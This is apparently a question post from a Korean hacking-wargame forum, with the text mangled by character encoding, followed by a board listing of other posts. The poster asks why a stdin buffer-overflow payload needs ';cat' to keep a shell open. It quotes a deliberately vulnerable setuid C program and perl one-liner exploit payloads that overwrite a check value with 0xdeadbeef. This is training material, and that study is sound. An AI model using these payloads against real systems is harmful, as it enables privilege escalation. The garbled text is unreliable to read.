·¹º§ ÇØÅ·

 2844, 8/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   bugfixer2
   ¸í¿¹ÀÇ Àü´ç¿¡ ¿À¸£½Å ºÐµéµµ. ÀÌ°Å Á¤¸» ¾Ë°í ³Ñ¾î°¡¼Ì³ª¿ä?[Áú¹®]

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2378 [º¹»ç]


level12 ³Ñ°Üº¸½ÅºÐµéÀº ¾Ë°ÚÁÒ...
¿À¹öÇÃ·Î¿ì ½Ãų º¯¼ö¿¡ ÀԷ¹æ½ÄÀÌ , ÀÎÀÚÀü´Þ ÀÌ ¾Æ´Ï¶ó..
Ç¥ÁØÀÔ·ÂÀ» ÅëÇؼ­ ÇÁ·Î¼¼¼­ ½ÇÇàÈÄ µû·Î ÀÔ·ÂÇØÁà¾ß
ÇÏ´Â Çü½ÄÀ̸é
$./attackme $RET
$./attackme `perl -e 'print "a"x ...'`

ÀÌ·±Çü½ÄÀº ÅëÇÏÁö ¾Ê½À´Ï´Ù.. ÀÎÀÚ·Î Àü´ÞÇØ”fÀÚ Àǹ̰¡ ¾ø´Â°Å°ÚÁÒ.
À̸®Àú¸® µ¹¾Æ´Ù´Ï¸é
$(perl -e 'print "A"x40,"\xef\xbe\xad\xde"';cat) | ./attackme

ÀÌ À̹ýÀÌ ´äÀ̶ó´Âµ¥¿ä...
ÀÌ°É Á¦´ë·Î ÀÌÇØÇÏ°í ³Ñ¾î°¡´Â »ç¶÷Àº ±²ÀåÈ÷ µå¹°¾î º¸ÀÔ´Ï´Ù.
Àú¶ÇÇÑ ±×´ç½Ã´Â ´ë°­ ³Ñ¾î°¬Áö¸¸(-_-;)
À̸®Àú¸® ±ÛµéÀ» ã¾ÆºÁµµ ÁÁÀº ´äº¯Àº ¾ø±º¿ä..

ÆÄÀÌÇÁ(|) ¸¦ ›§À¸´Ï
ls | more
Çϸé,
ls ¶ó´Â ÇÁ·Î¼¼½º¿Í more À̶ó´Â ÇÁ·Î¼¼½º°¡ µ¿½Ã¿¡ ½ÇÇàµÇ°í.
ÆÄÀÌÇÁ ¿ÞÂÊ ÇÁ·Î¼¼½º(ls) ÀÇ Ç¥ÁØÃâ·Â °á°ú°¡ ¿À¸¥ÂÊ ÇÁ·Î¼¼½º¿¡ ÀÔ·ÂÀÌ
µÇ°ÚÁÒ..

¹°·Ð Àúµµ ±×°Ç ¾Ë°í ÀÖ´Ù¸¸..

´ÙÀ½ ·¹º§ÀÇ ½©À» ¾ò±â À§ÇÑ ¸ðµç Áغñ´Â ´Ù ³¡³­»óȲÀÔ´Ï´Ù.
Á¦ ¸»¶æÀº...

°Á ¿¹¸¦ µéÁÒ¹¹..

level14 ¹®Á¦ ÀÔ´Ï´Ù. Á¶±Ý º¯Çü½ÃÄ×½À´Ï´Ù.
½©À» ¶ç¿ì±âÀü¿¡... done À» Ãâ·Â½ÃÅ°±â·Î.

#include

main()
{  int crap;
   int check;
   char buf[20];
   fgets(buf,45,stdin);
   if(check == 0xdeadbeef)
    {
       printf("Done! \n");
       setreuid(3095,3095);
       system("/bin/sh");
    }
}
------------------------------EOF

fgets()¸¦ ÅëÇؼ­ buf ¿¡ ÀÔ·ÂÇϳ׿ä..
±×·¡¼­ Àü »ý°¢Çß½À´Ï´Ù.

(perl -e (»ý·«),"\x00\x00\x00\x00"')|~/attackme

ÇÏ¸é µÇ°Ú±º.  À̶ó »ý°¢ÇÏ°í ½ÃµµÇØ”fÀ¸³ª..

done ±ÛÀÚ´Â ¶ßÁö¸¸,

½©Àº ½ÇÇàµÇÁö ¾Ê¾Ò½À´Ï´Ù.

¸Þ¸ð¸®¿¡ ÀÔ·ÂÀº Àߵ̴ܼҸ°µ¥...

¿Ö system("/bin/sh"); À̰͸¸ ½ÇÇàÀÌ ¾ÈµÌÀ»±î¿ä...

¿Ö ;cat À» ³Ö¾î¼­ (perl -e (»ý·«)\xde";cat)|./at

ÇÏ¸é ½©ÀÌ ¶ß´Â°É±î¿ä..  

ÀÚ¼¼ÇÑ ´äº¯ ºÎŹµå¸³´Ï´Ù..  Á¦°¡ ¾î¶²°É °øºÎÇغ¸¸é ¾Ë°ÔµÇ´Â°É±î¿ä;

  Hit : 3542     Date : 2007/04/22 09:39



    
2704     [re] ·¹º§4¿¡ Á¦ »ý°¢ÀÌ ¸Â´ÂÁö...[2]     Farcen
09/18 3554
2703   ·¹º§5... ·¹À̽ºÄÁµð¼Ç...[1]     Farcen
09/16 3551
2702   Á˼ÛÇѵ¥ ·¹º§4 Áú¹®Á» µå¸±°Ô¿ä...¤Ð[3]     qhoomi
09/23 3550
2701     [re] [level3]-ÀÚ¼¼ÇÑ ³»¿ëÀÔ´Ï´Ù..[4]     kuh3h3
07/14 3550
2700   level3¿¡ ´ëÇÑ ¼³¸í     koresong
03/25 3548
2699   Level11 ¿¡±×½©¹®Á¦..?[1]     topkpr1004
05/16 3546
  ¸í¿¹ÀÇ Àü´ç¿¡ ¿À¸£½Å ºÐµéµµ. ÀÌ°Å Á¤¸» ¾Ë°í ³Ñ¾î°¡¼Ì³ª¿ä?[Áú¹®]     bugfixer2
04/22 3541
2697   Ȳ´çÇÑ level3[17]     happykth1
09/26 3536
2696     [re] ·¹º§2 Á¦¹ß¿Ïº®ÇѴ亯¿ä..     ¼ÒÀ¯
09/18 3523
2695   -_-·¾3c¾ð¾î Çؼ®ºÒ°¡´É!!-_-Á¦±æ...[5]     alako88
09/09 3515
2694   ·¹º§4 Áú¹®ÀÔ´Ï´Ù[7]     hoyeng
08/06 3514
2693   ftz ȨÆäÀÌÁöÁ¢¼Ó[2]     ¿ù¿ù
12/10 3513
2692   ¾ÆÁ÷ ·¹º§1¿¡¼­ ÇظŴ Ãʺ¸ÀÔ´Ï´Ù...[5]     pepct
11/25 3513
2691   ·¹º§4°¡ ÀÌÇØ°¡ ¾ÈµÅ¿ä..     vngkgkx
09/06 3513
2690     [re] ·¹º§4¿¡¼­[4]     hkpco
10/03 3505
2689   level1¿¡ ´ëÇÑ ¼³¸í[1]     koresong
03/25 3503
2688   level2 Ç®À̹ý.[7]     pogusm
12/08 3503
2687   [lord of bof FC4] titan Áú¹®ÀÖ½À´Ï´Ù!!!!!! Á¦¹ß[3]     ¿ìÀ×22
07/04 3502
2686   ·¹º§ 12 ¿¡¼­ offset°ªÀ» ±¸ÇÏ´Â ÀÌÀ¯[1]     busjo
12/17 3501
2685     À½...[2]     bigfood
09/10 3488
[1][2][3][4][5][6][7] 8 [9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org